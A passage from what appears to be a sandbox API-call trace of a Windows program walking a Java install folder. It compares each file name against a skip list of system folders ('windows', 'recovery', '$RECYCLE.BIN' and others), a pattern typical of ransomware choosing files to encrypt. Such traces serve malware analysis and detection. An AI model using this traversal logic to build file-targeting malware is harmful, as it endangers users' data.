Flags=0x0, Size=0x20) returned 0x241218 [0069.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javafx_font.dll", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0069.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javafx_font.dll", cchWideChar=15, lpMultiByteStr=0x345ef10, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="javafx_font.dll", lpUsedDefaultChar=0x0) returned 15 [0069.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0069.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0069.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0069.695] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x83640, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="javafx_font_t2k.dll", cAlternateFileName="JAVAFX~2.DLL")) returned 1 [0069.695] lstrcmpiW (lpString1="javafx_font_t2k.dll", lpString2=".") returned 1 [0069.695] lstrcmpiW (lpString1="javafx_font_t2k.dll", lpString2="..") returned 1 [0069.695] lstrcmpiW (lpString1="javafx_font_t2k.dll", lpString2="...") returned 1 [0069.695] lstrcmpiW (lpString1="javafx_font_t2k.dll", lpString2="windows") returned -1 [0069.695] lstrcmpiW (lpString1="javafx_font_t2k.dll", lpString2="recovery") returned -1 [0069.695] lstrcmpiW (lpString1="javafx_font_t2k.dll", lpString2="perflogs") returned -1 [0069.695] lstrcmpiW (lpString1="javafx_font_t2k.dll", lpString2="documents and settings") returned 1 [0069.695] lstrcmpiW (lpString1="javafx_font_t2k.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.695] lstrcmpiW (lpString1="javafx_font_t2k.dll", lpString2="system volume information") returned -1 [0069.695] lstrcmpiW (lpString1="javafx_font_t2k.dll", lpString2="msocache") returned -1 [0069.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javafx_font_t2k.dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0069.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0069.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javafx_font_t2k.dll", cchWideChar=19, lpMultiByteStr=0x241100, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="javafx_font_t2k.dll", lpUsedDefaultChar=0x0) returned 19 [0069.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javafx_font_t2k.dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0069.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0069.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javafx_font_t2k.dll", cchWideChar=19, lpMultiByteStr=0x241268, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="javafx_font_t2k.dll", lpUsedDefaultChar=0x0) returned 19 [0069.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0069.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0069.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0069.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0069.696] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa747934d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa747934d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1f440, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="javafx_iio.dll", cAlternateFileName="JAVAFX~3.DLL")) returned 1 [0069.696] lstrcmpiW (lpString1="javafx_iio.dll", lpString2=".") returned 1 [0069.696] lstrcmpiW (lpString1="javafx_iio.dll", lpString2="..") returned 1 [0069.696] lstrcmpiW (lpString1="javafx_iio.dll", lpString2="...") returned 1 [0069.696] lstrcmpiW (lpString1="javafx_iio.dll", lpString2="windows") returned -1 [0069.696] lstrcmpiW (lpString1="javafx_iio.dll", lpString2="recovery") returned -1 [0069.696] lstrcmpiW (lpString1="javafx_iio.dll", lpString2="perflogs") returned -1 [0069.696] lstrcmpiW (lpString1="javafx_iio.dll", lpString2="documents and settings") returned 1 [0069.696] lstrcmpiW (lpString1="javafx_iio.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.696] lstrcmpiW (lpString1="javafx_iio.dll", lpString2="system volume information") returned -1 [0069.696] lstrcmpiW (lpString1="javafx_iio.dll", lpString2="msocache") returned -1 [0069.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0069.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javafx_iio.dll", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0069.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javafx_iio.dll", cchWideChar=14, lpMultiByteStr=0x345ef40, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="javafx_iio.dll", lpUsedDefaultChar=0x0) returned 14 [0069.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0069.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0069.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javafx_iio.dll", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0069.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javafx_iio.dll", cchWideChar=14, lpMultiByteStr=0x345ef10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="javafx_iio.dll", lpUsedDefaultChar=0x0) returned 14 [0069.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0069.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0069.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0069.696] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa747934d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa747934d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x32840, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="javaw.exe", cAlternateFileName="")) returned 1 [0069.696] lstrcmpiW (lpString1="javaw.exe", lpString2=".") returned 1 [0069.696] lstrcmpiW (lpString1="javaw.exe", lpString2="..") returned 1 [0069.696] lstrcmpiW (lpString1="javaw.exe", lpString2="...") returned 1 [0069.696] lstrcmpiW (lpString1="javaw.exe", lpString2="windows") returned -1 [0069.696] lstrcmpiW (lpString1="javaw.exe", lpString2="recovery") returned -1 [0069.696] lstrcmpiW (lpString1="javaw.exe", lpString2="perflogs") returned -1 [0069.696] lstrcmpiW (lpString1="javaw.exe", lpString2="documents and settings") returned 1 [0069.696] lstrcmpiW (lpString1="javaw.exe", lpString2="$RECYCLE.BIN") returned 1 [0069.696] lstrcmpiW (lpString1="javaw.exe", lpString2="system volume information") returned -1 [0069.696] lstrcmpiW (lpString1="javaw.exe", lpString2="msocache") returned -1 [0069.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0069.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javaw.exe", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0069.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javaw.exe", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="javaw.exe", lpUsedDefaultChar=0x0) returned 9 [0069.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0069.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0069.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javaw.exe", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0069.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javaw.exe", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="javaw.exe", lpUsedDefaultChar=0x0) returned 9 [0069.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0069.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0069.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0069.697] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa747934d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa747934d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4e040, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="javaws.exe", cAlternateFileName="")) returned 1 [0069.697] lstrcmpiW (lpString1="javaws.exe", lpString2=".") returned 1 [0069.697] lstrcmpiW (lpString1="javaws.exe", lpString2="..") returned 1 [0069.697] lstrcmpiW (lpString1="javaws.exe", lpString2="...") returned 1 [0069.697] lstrcmpiW (lpString1="javaws.exe", lpString2="windows") returned -1 [0069.697] lstrcmpiW (lpString1="javaws.exe", lpString2="recovery") returned -1 [0069.697] lstrcmpiW (lpString1="javaws.exe", lpString2="perflogs") returned -1 [0069.697] lstrcmpiW (lpString1="javaws.exe", lpString2="documents and settings") returned 1 [0069.697] lstrcmpiW (lpString1="javaws.exe", lpString2="$RECYCLE.BIN") returned 1 [0069.697] lstrcmpiW (lpString1="javaws.exe", lpString2="system volume information") returned -1 [0069.697] lstrcmpiW (lpString1="javaws.exe", lpString2="msocache") returned -1 [0069.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0069.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javaws.exe", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0069.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javaws.exe", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="javaws.exe", lpUsedDefaultChar=0x0) returned 10 [0069.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0069.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0069.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javaws.exe", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0069.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javaws.exe", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="javaws.exe", lpUsedDefaultChar=0x0) returned 10 [0069.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0069.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0069.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0069.697] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa747934d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa747934d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x7440, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="java_crw_demo.dll", cAlternateFileName="JAVA_C~1.DLL")) returned 1 [0069.697] lstrcmpiW (lpString1="java_crw_demo.dll", lpString2=".") returned 1 [0069.698] lstrcmpiW (lpString1="java_crw_demo.dll", lpString2="..") returned 1 [0069.698] lstrcmpiW (lpString1="java_crw_demo.dll", lpString2="...") returned 1 [0069.698] lstrcmpiW (lpString1="java_crw_demo.dll", lpString2="windows") returned -1 [0069.698] lstrcmpiW (lpString1="java_crw_demo.dll", lpString2="recovery") returned -1 [0069.698] lstrcmpiW (lpString1="java_crw_demo.dll", lpString2="perflogs") returned -1 [0069.698] lstrcmpiW (lpString1="java_crw_demo.dll", lpString2="documents and settings") returned 1 [0069.698] lstrcmpiW (lpString1="java_crw_demo.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.698] lstrcmpiW (lpString1="java_crw_demo.dll", lpString2="system volume information") returned -1 [0069.698] lstrcmpiW (lpString1="java_crw_demo.dll", lpString2="msocache") returned -1 [0069.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="java_crw_demo.dll", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0069.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="java_crw_demo.dll", cchWideChar=17, lpMultiByteStr=0x2411f0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="java_crw_demo.dll", lpUsedDefaultChar=0x0) returned 17 [0069.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="java_crw_demo.dll", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0069.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="java_crw_demo.dll", cchWideChar=17, lpMultiByteStr=0x2413d0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="java_crw_demo.dll", lpUsedDefaultChar=0x0) returned 17 [0069.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0069.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0069.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0069.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0069.698] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa747934d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa747934d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3840, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="jawt.dll", cAlternateFileName="")) returned 1 [0069.698] lstrcmpiW (lpString1="jawt.dll", lpString2=".") returned 1 [0069.698] lstrcmpiW (lpString1="jawt.dll", lpString2="..") returned 1 [0069.698] lstrcmpiW (lpString1="jawt.dll", lpString2="...") returned 1 [0069.698] lstrcmpiW (lpString1="jawt.dll", lpString2="windows") returned -1 [0069.698] lstrcmpiW (lpString1="jawt.dll", lpString2="recovery") returned -1 [0069.698] lstrcmpiW (lpString1="jawt.dll", lpString2="perflogs") returned -1 [0069.698] lstrcmpiW (lpString1="jawt.dll", lpString2="documents and settings") returned 1 [0069.698] lstrcmpiW (lpString1="jawt.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.698] lstrcmpiW (lpString1="jawt.dll", lpString2="system volume information") returned -1 [0069.698] lstrcmpiW (lpString1="jawt.dll", lpString2="msocache") returned -1 [0069.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0069.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jawt.dll", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0069.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jawt.dll", cchWideChar=8, lpMultiByteStr=0x345ef40, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jawt.dll", lpUsedDefaultChar=0x0) returned 8 [0069.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0069.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0069.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jawt.dll", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0069.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jawt.dll", cchWideChar=8, lpMultiByteStr=0x345ef10, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jawt.dll", lpUsedDefaultChar=0x0) returned 8 [0069.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0069.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0069.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0069.699] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa747934d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa747934d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3c40, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="JAWTAccessBridge-64.dll", cAlternateFileName="JAWTAC~1.DLL")) returned 1 [0069.699] lstrcmpiW (lpString1="JAWTAccessBridge-64.dll", lpString2=".") returned 1 [0069.699] lstrcmpiW (lpString1="JAWTAccessBridge-64.dll", lpString2="..") returned 1 [0069.699] lstrcmpiW (lpString1="JAWTAccessBridge-64.dll", lpString2="...") returned 1 [0069.699] lstrcmpiW (lpString1="JAWTAccessBridge-64.dll", lpString2="windows") returned -1 [0069.700] lstrcmpiW (lpString1="JAWTAccessBridge-64.dll", lpString2="recovery") returned -1 [0069.700] lstrcmpiW (lpString1="JAWTAccessBridge-64.dll", lpString2="perflogs") returned -1 [0069.700] lstrcmpiW (lpString1="JAWTAccessBridge-64.dll", lpString2="documents and settings") returned 1 [0069.700] lstrcmpiW (lpString1="JAWTAccessBridge-64.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.700] lstrcmpiW (lpString1="JAWTAccessBridge-64.dll", lpString2="system volume information") returned -1 [0069.700] lstrcmpiW (lpString1="JAWTAccessBridge-64.dll", lpString2="msocache") returned -1 [0069.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JAWTAccessBridge-64.dll", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0069.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0069.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JAWTAccessBridge-64.dll", cchWideChar=23, lpMultiByteStr=0x240fc0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JAWTAccessBridge-64.dll", lpUsedDefaultChar=0x0) returned 23 [0069.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JAWTAccessBridge-64.dll", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0069.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0069.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JAWTAccessBridge-64.dll", cchWideChar=23, lpMultiByteStr=0x2411c8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JAWTAccessBridge-64.dll", lpUsedDefaultChar=0x0) returned 23 [0069.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0069.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0069.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0069.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0069.700] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa747934d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa747934d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x31440, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="jdwp.dll", cAlternateFileName="")) returned 1 [0069.700] lstrcmpiW (lpString1="jdwp.dll", lpString2=".") returned 1 [0069.700] lstrcmpiW (lpString1="jdwp.dll", lpString2="..") returned 1 [0069.700] lstrcmpiW (lpString1="jdwp.dll", lpString2="...") returned 1 [0069.700] lstrcmpiW (lpString1="jdwp.dll", lpString2="windows") returned -1 [0069.700] lstrcmpiW (lpString1="jdwp.dll", lpString2="recovery") returned -1 [0069.700] lstrcmpiW (lpString1="jdwp.dll", lpString2="perflogs") returned -1 [0069.700] lstrcmpiW (lpString1="jdwp.dll", lpString2="documents and settings") returned 1 [0069.700] lstrcmpiW (lpString1="jdwp.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.700] lstrcmpiW (lpString1="jdwp.dll", lpString2="system volume information") returned -1 [0069.700] lstrcmpiW (lpString1="jdwp.dll", lpString2="msocache") returned -1 [0069.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0069.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jdwp.dll", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0069.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jdwp.dll", cchWideChar=8, lpMultiByteStr=0x345ef40, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jdwp.dll", lpUsedDefaultChar=0x0) returned 8 [0069.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0069.701] RtlAllocateHeap 